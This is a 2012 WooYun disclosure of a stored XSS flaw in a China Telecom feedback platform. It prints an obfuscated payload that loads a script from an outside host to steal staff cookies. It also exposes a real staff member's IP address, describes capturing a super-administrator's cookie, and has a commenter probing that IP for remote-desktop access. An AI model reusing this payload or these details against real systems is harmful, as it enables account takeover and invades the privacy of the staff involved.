当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05230

漏洞标题:中国电信某平台储存型跨站

相关厂商:中国电信

漏洞作者: pestu

提交时间:2012-03-13 14:18

修复时间:2012-04-27 14:18

公开时间:2012-04-27 14:18

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-13: 细节已通知厂商并且等待厂商处理中
2012-03-14: 厂商已经确认,细节仅向厂商公开
2012-03-24: 细节向核心白帽子及相关领域专家公开
2012-04-03: 细节向普通白帽子公开
2012-04-13: 细节向实习白帽子公开
2012-04-27: 细节向公众公开

简要描述:

中国电信某平台对客户提交的留言没有进行严格验证,输出到客户端时也没有进行转义导致xss漏洞。通过xss可获取管理员cookie,管理平台地址,管理员的IP地址及所使用的浏览器等信息,进而以管理员身份登录管理平台。

详细说明:

中国电信有一个中国电信互联网产品用户问题反馈平台,通过该平台用户可反馈中国电信各互联网产品的bug。如图:


由于该平台对对客户提交的留言没有进行严格验证,输出到客户端时也没有进行转义导致xss漏洞。这里选取189邮箱做测试,首先登录189邮箱,点击右上角的反馈:


打开反馈页面:


当然这里直接输入javascript脚本是不可以的,网页中有一段javascript对输入的反馈留言做了判断,由于是客户端的判断,所以很容易绕过,这里就不多说罢。
提交以下反馈至服务器

<img src='http://www.baidu.com/img/baidu_logo.gif' onload='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,115,116,117,110,111,116,101,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,63)++ new Date().getTime(); ;document.body.appendChild(s);'/>


以上代码类似于

<script type="text/javascript">
var s=document.createElement("script");
s.type="text/javascript";
s.src="http://stunote.sinaapp.com/xss.js?" + new Date().getTime();
document.body.appendChild(s);
</script>


这里有个小技巧,js文件名是xss.js?1331394206172这种形式,主要是为了方便调试。
这样浏览器就会以为每次引用的js文件都是不同的,当然我们的xss.js对后面的动态数并不进行处理.这次每次读取到的都是最新的js文件,js文件修改后效果可以马上看到,非常方便.
xss.js可以是如下内容:

alert(document.cookie);
alert(document.domain);


弹出cookie和当前的域名


域名:


当然我们也可以换成获取cookie和其他信息的js脚本。
当客服看到我们的留言时就会触发,获取到的客服cookie如下:


从上图可以看到客服IP为 59.36.102.177 经查询该IP所在地为中国广东省广州市
看来客服是在广州上网的,浏览器为IE7.
有了cookie就好办了,你懂的。

漏洞证明:


这里只对189邮箱的反馈平台作了测试,相信其他产品的反馈也存在类拟的问题。

修复方案:

对客户输入在服务器端进行过滤或对客户的留言输出时进行htmlencode

版权声明:转载请注明来源 pestu@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-03-14 16:38

厂商回复:

CNVD确认漏洞情况,将由CNCERT直接协调中国电信集团公司处置。鉴于pestu同学在上回已经提交了两个相似系统的XSS漏洞,该漏洞仅追加rank 5。
同时该漏洞也说明相关方有漏洞处置方面力度仍有欠缺,CNCERT也将继续监督。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-03-13 14:41 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    洞主行家

  2. 2012-03-13 14:45 | 黑龙 ( 路人 | Rank:5 漏洞数:4 | http://bit.ly/zCr8h5)

    期待细节

  3. 2012-03-21 10:51 | pestu ( 普通白帽子 | Rank:170 漏洞数:13 | 关注计算机网络安全 lnmpa技术)

    @xsser 由于之前的反馈一直没有删除,每次客服或管理员打开就会触发,昨天抓到了超集管理员的cookie.. xsser 咨询个问题:核心白帽子多次评一次?

  4. 2012-04-27 14:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @pestu 刚看到这个...首先恭喜你抓到超级管理的cookie,其次我们在5.1不放假解决这个用户评级的问题吧...

  5. 2012-04-27 14:31 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)

    @pestu rank贡献度前10%和部分提供安全价值较高被评为精华信息的用户将被选取为核心白帽子。详见:http://www.wooyun.org/notice.php?action=view&id=18

  6. 2013-12-22 00:13 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    3389 59.36.102.177:40974 有密码么?